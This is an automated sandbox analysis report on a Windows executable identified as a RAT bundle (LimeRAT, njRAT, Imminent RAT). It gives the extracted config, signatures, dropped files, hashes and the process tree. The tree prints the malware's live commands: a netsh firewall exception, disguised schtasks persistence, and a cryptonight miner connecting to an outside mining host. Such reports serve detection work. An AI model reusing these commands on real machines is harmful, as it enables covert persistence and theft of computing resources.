Overview

overview

10

Static

static

5

018e93f668...18.exe

windows7-x64

10

018e93f668...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-04-2024 20:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe

  • Size

    24.3MB

  • MD5

    018e93f66899228a3e980f8fa671c021

  • SHA1

    76c9e359cf572757ba0bf5e372de1780f5fbae05

  • SHA256

    46141664081fd940edcf0db0adcd081736a3bd5e2f9639037fc598e558104b31

  • SHA512

    1804d279136feda7c468c63486d15e1b57f1c028d7e926cb733bf8f7c2c7d4b5b3506457b282393182cdcc7a71966b2ba9148d7b8f473a7367bace2b680b0056

  • SSDEEP

    393216:d0pgWC+4cw08gMka47tPxDKdUU7K9HuNW7BqTOjDtXLEc3uoTHn:ZXjcCtkJPxkn8uw7Bq8X82n

Score
10/10
imminentlimeratnjratevasionpersistenceratspywaretrojan

Malware Config

Extracted

Family

limerat

Wallets

1JBKLGyE6AnRGvk92A8x3m8qmXfh3fcEty

Attributes
  • aes_key

    nulled

  • antivm

    true

  • c2_url

    https://pastebin.com/raw/cXuQ0V20

  • delay

    3

  • download_payload

    false

  • install

    false

  • install_name

    Winservices.exe

  • main_folder

    AppData

  • pin_spread

    false

  • sub_folder

    \

  • usb_spread

    true

Signatures

  • Imminent RAT

    Remote-access trojan based on Imminent Monitor remote admin software.

    trojanspywareimminent
  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

    ratlimerat
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 13 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • AutoIT Executable 5 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2944
    • C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
      "C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
          4⤵
          • Modifies Windows Firewall
          PID:2720
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F
        3⤵
        • Creates scheduled task(s)
        PID:4972
    • C:\Users\Admin\AppData\Local\Temp\cleaner.exe
      "C:\Users\Admin\AppData\Local\Temp\cleaner.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4572
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
        3⤵
        • Maps connected drives based on registry
        • Suspicious use of AdjustPrivilegeToken
        PID:4564
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F
        3⤵
        • Creates scheduled task(s)
        PID:888
    • C:\Users\Admin\AppData\Local\Temp\Torrent.exe
      "C:\Users\Admin\AppData\Local\Temp\Torrent.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2776
      • C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
        "C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5092
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=50
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4376
    • C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
      "C:\Users\Admin\AppData\Local\Temp\μTorrent.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5064
      • C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
        "C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2780
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=50
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4496
    • C:\Users\Admin\AppData\Local\Temp\Project1.exe
      "C:\Users\Admin\AppData\Local\Temp\Project1.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      PID:3316
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3316 -s 1088
        3⤵
        • Program crash
        PID:2360
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      2⤵
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:768
      • C:\Windows\SysWOW64\Taskmgr.exe
        "C:\Windows\System32\Taskmgr.exe"
        3⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4452
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F
      2⤵
      • Creates scheduled task(s)
      PID:1352
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3316 -ip 3316
    1⤵
      PID:3368
    • C:\Windows\system32\wbem\WmiApSrv.exe
      C:\Windows\system32\wbem\WmiApSrv.exe
      1⤵
        PID:2800
      • C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe
        C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe
        1⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:3968
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
          2⤵
            PID:3772
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F
            2⤵
            • Creates scheduled task(s)
            PID:4212
        • C:\Users\Admin\secinit\sdchange.exe
          C:\Users\Admin\secinit\sdchange.exe
          1⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2352
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
            2⤵
              PID:4592
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F
              2⤵
              • Creates scheduled task(s)
              PID:2932
          • C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
            C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
            1⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:4776
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              2⤵
                PID:4904
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F
                2⤵
                • Creates scheduled task(s)
                PID:2980
            • C:\Users\Admin\secinit\sdchange.exe
              C:\Users\Admin\secinit\sdchange.exe
              1⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:2728
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
                2⤵
                  PID:2284
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F
                  2⤵
                  • Creates scheduled task(s)
                  PID:3224
              • C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
                C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
                1⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:2140
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  2⤵
                    PID:3936
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F
                    2⤵
                    • Creates scheduled task(s)
                    PID:1460
                • C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe
                  C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe
                  1⤵
                  • Executes dropped EXE
                  PID:4684

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log
                  Filesize

                  316B

                  MD5

                  9f893d94b017a0684012d50319c9ffbe

                  SHA1

                  140cc2cb6b2520ba4f9a1f666a5f679853472793

                  SHA256

                  8a7cb420c82edf1bb2c7bdfef52091e5169fabaecc370e120985e91406fcbbec

                  SHA512

                  4b7df94d3622b82d852b0f532d7fd810ca2113d7b737ec417023d5b2142e9e79414a06d22647d73f8bc114f8e871a3a741a479b0aba48892f9078975ec78acba

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NetFramework.exe.log
                  Filesize

                  1KB

                  MD5

                  45bc08b96d0a42db5f33963f68aeff54

                  SHA1

                  2cd2c242cc5c0303c3752519da1c783d8c669c7a

                  SHA256

                  5bc8d756a311152bb5e4b40aa4e2e3a61afbd4f685382b26835b03a0b793fcb7

                  SHA512

                  4c1e96568a8995ce50814685a24eb20f573c5501ce20cb02982bba0674ff41f98601215339c46378de0198a4c582c8e28316e8d6d0ffeacff7cfb5d35109d1a9

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
                  Filesize

                  507B

                  MD5

                  6832f1ed5b3043154d3b685cce8c8b87

                  SHA1

                  4c42ec0798aaad1fe7d7650e9e7c00bf978658b3

                  SHA256

                  fa9d245a676b1e7c3ebd887c5e0d1655ddcb7faf632197796dbb61eaf5131061

                  SHA512

                  cb847efcab6c67bbe0677984a6421befb559a32a33ea814d7acef539365f03cd14715e21e5d02b8d770abd73e74f8df108225aa1eb7dc8caca1723de15135584

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
                  Filesize

                  1.1MB

                  MD5

                  d18ce77a75017e627de41febd9e289ee

                  SHA1

                  012a66d318e8294492accc0beca42c9999b68146

                  SHA256

                  7d6e025a8d510b10988375f020c60efec7d6ee77367ed8879e8a3b1172a5efd4

                  SHA512

                  c5f24a7f7c9e8ed552aa6402539171551851afd86b85b28e4018c2c8cd38c4ed22cb726eec5f750d90a25343e61e1cc97c62b1a486cbac6e04b777886411c86f

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\Project1.exe
                  Filesize

                  6.7MB

                  MD5

                  1166591fc5f77c463d176bcca574efff

                  SHA1

                  35d710b8983945aaf8c39d289fd6c73ed1f00b65

                  SHA256

                  a51c6e6c19be022dcbf235a9bebeab1b73292e2ee40b48653e80b96f10aa9bad

                  SHA512

                  751f5cf2cc5316ddbbba2805ac9c3fee24d80a85c92587c85ac80a2033aaeef96f58bcb5053584bcea7ad8fcb538183da9d29360f44666e1bfd3bdf0f08caa97

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe
                  Filesize

                  1.1MB

                  MD5

                  bcf5880698e760a8e7eff7534b5f763f

                  SHA1

                  da463d735f08cd5fb49dd5587fcfffbd2def8a91

                  SHA256

                  98bb7ef967aff495344931b58c214de7449c02f10696d627fdba813b242cd854

                  SHA512

                  6f346038394b850f14b563dfb9b1378384e09b535783705719777f46e3aabbef82368ffbd394d15b0454137905ba0fa91200b16fc8f0d41c40f14aa37e53f87d

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\Torrent.exe
                  Filesize

                  6.9MB

                  MD5

                  cedb1319e9cbd45f4cc69e58699009d3

                  SHA1

                  ef66c3f343744a6afa9b9955d65e6ccaba41c27e

                  SHA256

                  5f61384bf58773755f2ae7500b1e24b1394df6b69c80d240ad0731842c908808

                  SHA512

                  bb204c60f138e4a341a6eafed2b39409105805e391bea572e5df0d8f0a24e5af8e2d2da9fedb26460adef321079efbe8443fa08bb0e0b3702e6478452bb26bd8

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\cleaner.exe
                  Filesize

                  1.1MB

                  MD5

                  b4bae96dc11834b254ec53b2cdba13aa

                  SHA1

                  7b67438093eb1860237bf88aefebf56bb9333aba

                  SHA256

                  bcd5d4c36ee50d99d6ae1aa91c0c12569f711d37e7b59a3483f413c7c2b68142

                  SHA512

                  ea2b93b7f9046e931812ab8efd364502d936ad28fa174f1c63d79fa46bedc5bbbf3476c0b551e40ae75bf82cbb3c5a107e41b49aeb6cd0b5fc294a5813519eda

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
                  Filesize

                  6.9MB

                  MD5

                  7e962cb55be5963163d4f6a21100950c

                  SHA1

                  f58ad41f8c86b9cffc7d66f4991162f731926d1d

                  SHA256

                  1e6af101af20d01594ae2d42d066198b7e226546e6cd9f37594783618e758968

                  SHA512

                  757996c16752816850607d4ef1cb12e002133c73a2c431ef735aa56f01bf33a6ea4e2725556e2a53a4603552348477fa72c286afdf1fd605ea5f8671b2486b3a

                  Download Submit

                • C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
                  Filesize

                  24.3MB

                  MD5

                  222d68d687ca102310b3887eae8963ec

                  SHA1

                  b0966d0e81b63d68e2dfa13131d5b0556921a8a4

                  SHA256

                  07f121eab7e49a7a7d8002407b310011555b719777ad1468eac6db5d0c5850aa

                  SHA512

                  4e3bf9a7168d42f911d2ecb4bc1556dfabea648e4595dbcae18518076d2994069a1d379aa4ff531f7b3870faf8d4431d371174afcb76884353e92a94221553eb

                  Download Submit

                • C:\Users\Admin\secinit\sdchange.exe
                  Filesize

                  1.1MB

                  MD5

                  7c9ba3bbb5ad2b06bcfce9b114d0f258

                  SHA1

                  f1789201e54b8f0d0b205c2cbde9e5de6cfe3a5c

                  SHA256

                  3a52a8f1550850b66dba1646a0169f261b636ed7f62cdf748a4b574f5b65e0b4

                  SHA512

                  dc39b54488158125aa6e2a74ebe9ecdb8044a1d5cb6b1404decfa9e2b90f64c99a2515010444b59f619fa6d2fbc8db7e7f3d6362af7b030ad7ff6bebc7bd2f96

                  Download Submit

                • memory/768-137-0x0000000005520000-0x0000000005586000-memory.dmp

                  Filesize

                  408KB

                  Download

                • memory/768-147-0x00000000069F0000-0x00000000069FA000-memory.dmp

                  Filesize

                  40KB

                  Download

                • memory/768-146-0x00000000063C0000-0x00000000063D6000-memory.dmp

                  Filesize

                  88KB

                  Download

                • memory/768-141-0x0000000006230000-0x0000000006248000-memory.dmp

                  Filesize

                  96KB

                  Download

                • memory/768-136-0x00000000051D0000-0x0000000005262000-memory.dmp

                  Filesize

                  584KB

                  Download

                • memory/768-107-0x0000000000A30000-0x0000000000A40000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/768-131-0x00000000055A0000-0x0000000005B44000-memory.dmp

                  Filesize

                  5.6MB

                  Download

                • memory/768-102-0x0000000000160000-0x00000000001B6000-memory.dmp

                  Filesize

                  344KB

                  Download

                • memory/768-110-0x0000000004E50000-0x0000000004EEC000-memory.dmp

                  Filesize

                  624KB

                  Download

                • memory/768-109-0x0000000004BC0000-0x0000000004BE8000-memory.dmp

                  Filesize

                  160KB

                  Download

                • memory/768-108-0x0000000004C00000-0x0000000004CAE000-memory.dmp

                  Filesize

                  696KB

                  Download

                • memory/2776-34-0x0000000000940000-0x0000000001026000-memory.dmp

                  Filesize

                  6.9MB

                  Download

                • memory/3316-74-0x0000000002CF0000-0x0000000002CF1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-61-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-83-0x0000000002D20000-0x0000000002D21000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-84-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-81-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-97-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-114-0x00000000037D0000-0x00000000037D1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-113-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-112-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-111-0x00000000037C0000-0x00000000037C1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-122-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-115-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-85-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-80-0x0000000002D10000-0x0000000002D11000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-79-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-78-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-77-0x0000000002D00000-0x0000000002D01000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-75-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-86-0x0000000002D30000-0x0000000002D31000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-73-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-72-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-71-0x0000000002CE0000-0x0000000002CE1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-69-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-68-0x0000000002CD0000-0x0000000002CD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-67-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-65-0x0000000002CC0000-0x0000000002CC1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-70-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-66-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-62-0x0000000002CB0000-0x0000000002CB1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-82-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-60-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-59-0x0000000002CA0000-0x0000000002CA1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-64-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-63-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-58-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-123-0x0000000003800000-0x0000000003801000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-121-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-120-0x00000000037F0000-0x00000000037F1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-119-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-118-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-117-0x00000000037E0000-0x00000000037E1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-116-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-87-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-89-0x0000000002D40000-0x0000000002D41000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-90-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-91-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-92-0x0000000002D50000-0x0000000002D51000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-93-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-94-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-56-0x0000000002C90000-0x0000000002C91000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-57-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-76-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-95-0x00000000037B0000-0x00000000037B1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/3316-96-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3316-88-0x00000000028C0000-0x0000000002A00000-memory.dmp

                  Filesize

                  1.2MB

                  Download

                • memory/3936-285-0x0000000000560000-0x00000000005B6000-memory.dmp

                  Filesize

                  344KB

                  Download

                • memory/4564-98-0x0000000000400000-0x000000000040C000-memory.dmp

                  Filesize

                  48KB

                  Download

                • memory/4904-251-0x0000000000400000-0x0000000000456000-memory.dmp

                  Filesize

                  344KB

                  Download

                • memory/5064-45-0x0000000000B30000-0x0000000001216000-memory.dmp

                  Filesize

                  6.9MB

                  Download

                • memory/5092-170-0x0000000003690000-0x0000000003698000-memory.dmp

                  Filesize

                  32KB

                  Download